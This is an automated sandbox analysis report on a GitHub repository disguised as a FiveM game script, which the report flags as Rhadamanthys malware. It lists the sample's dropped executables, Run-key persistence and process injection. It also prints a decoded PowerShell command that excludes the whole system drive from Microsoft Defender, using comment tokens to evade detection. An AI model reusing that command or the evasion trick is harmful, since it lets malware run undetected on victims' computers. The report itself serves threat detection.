Analysis Overview
Threat Level: Known bad
The file https://github.com/Xander3434/SKRIPTGG-FIVEM?tab=readme-ov-file was found to be: Known bad.
Malicious Activity Summary
Suspicious use of NtCreateUserProcessOtherParentProcess
Rhadamanthys
Loads dropped DLL
UPX packed file
Executes dropped EXE
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Detects Pyinstaller
Enumerates physical storage devices
Modifies registry class
Suspicious behavior: GetForegroundWindowSpam
Enumerates system info in registry
NTFS ADS
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Kills process with taskkill
Suspicious use of WriteProcessMemory
Suspicious use of SendNotifyMessage
Modifies data under HKEY_USERS
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-03-27 17:14
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-27 17:14
Reported
2024-03-27 17:16
Platform
win11-20240221-en
Max time kernel
52s
Max time network
55s
Command Line
Signatures
Rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 3468 created 2556 | N/A | C:\Users\Admin\AppData\Local\svchost.exe | C:\Windows\system32\sihost.exe |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO8141FAF7\launcher.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3084248216-1643706459-906455512-1000\Software\Microsoft\Windows\CurrentVersion\Run\Update64 = "C:\\Users\\Admin\\explorer.exe" | C:\Users\Admin\explorer.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | camo.githubusercontent.com | N/A | N/A |
| N/A | camo.githubusercontent.com | N/A | N/A |
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133560333151871935" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3084248216-1643706459-906455512-1000_Classes\Local Settings | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\SKRIPTGG-FIVEM-main.zip:Zone.Identifier | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Temp\7zO8141FAF7\launcher.exe:Zone.Identifier | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\sihost.exe
sihost.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://github.com/Xander3434/SKRIPTGG-FIVEM?tab=readme-ov-file
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffe71de9758,0x7ffe71de9768,0x7ffe71de9778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1696 --field-trial-handle=1856,i,15691179753510776645,15795851274177222192,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 --field-trial-handle=1856,i,15691179753510776645,15795851274177222192,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2188 --field-trial-handle=1856,i,15691179753510776645,15795851274177222192,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2984 --field-trial-handle=1856,i,15691179753510776645,15795851274177222192,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2996 --field-trial-handle=1856,i,15691179753510776645,15795851274177222192,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5404 --field-trial-handle=1856,i,15691179753510776645,15795851274177222192,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4956 --field-trial-handle=1856,i,15691179753510776645,15795851274177222192,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5612 --field-trial-handle=1856,i,15691179753510776645,15795851274177222192,131072 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Temp1_SKRIPTGG-FIVEM-main.zip\SKRIPTGG-FIVEM-main\Skript.rar"
C:\Users\Admin\AppData\Local\Temp\7zO8141FAF7\launcher.exe
"C:\Users\Admin\AppData\Local\Temp\7zO8141FAF7\launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAaQB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAZgBnACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAcgBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAYQBjACMAPgA="
Decoded -EncodedCommand (UTF-16LE base64): <#giz#>Add-MpPreference <#xfg#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#zrg#> -Force <#dac#>
This adds the user profile and the whole system drive to the Microsoft Defender exclusion list; the <#...#> tokens are empty block comments inserted to break simple string matching.
C:\Users\Admin\AppData\Local\Temp\explorer.exe
"C:\Users\Admin\AppData\Local\Temp\explorer.exe"
C:\Users\Admin\AppData\Local\svchost.exe
"C:\Users\Admin\AppData\Local\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\explorer.exe
"C:\Users\Admin\AppData\Local\Temp\explorer.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\activate.bat
C:\Windows\system32\taskkill.exe
taskkill /f /im "explorer.exe"
C:\Users\Admin\explorer.exe
"explorer.exe"
C:\Users\Admin\explorer.exe
"explorer.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=748 --field-trial-handle=1856,i,15691179753510776645,15795851274177222192,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=744 --field-trial-handle=1856,i,15691179753510776645,15795851274177222192,131072 /prefetch:8
C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.4:443 | github.com | tcp |
| DE | 140.82.121.4:443 | github.com | tcp |
| US | 8.8.8.8:53 | 4.121.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.133:443 | repository-images.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | repository-images.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | repository-images.githubusercontent.com | tcp |
| GB | 142.250.180.10:443 | content-autofill.googleapis.com | tcp |
| US | 140.82.114.22:443 | collector.github.com | tcp |
| US | 140.82.114.22:443 | collector.github.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| DE | 140.82.121.6:443 | api.github.com | tcp |
| GB | 142.250.180.10:443 | content-autofill.googleapis.com | udp |
| DE | 140.82.121.10:443 | codeload.github.com | tcp |
| N/A | 224.0.0.251:5353 | N/A | udp |
Files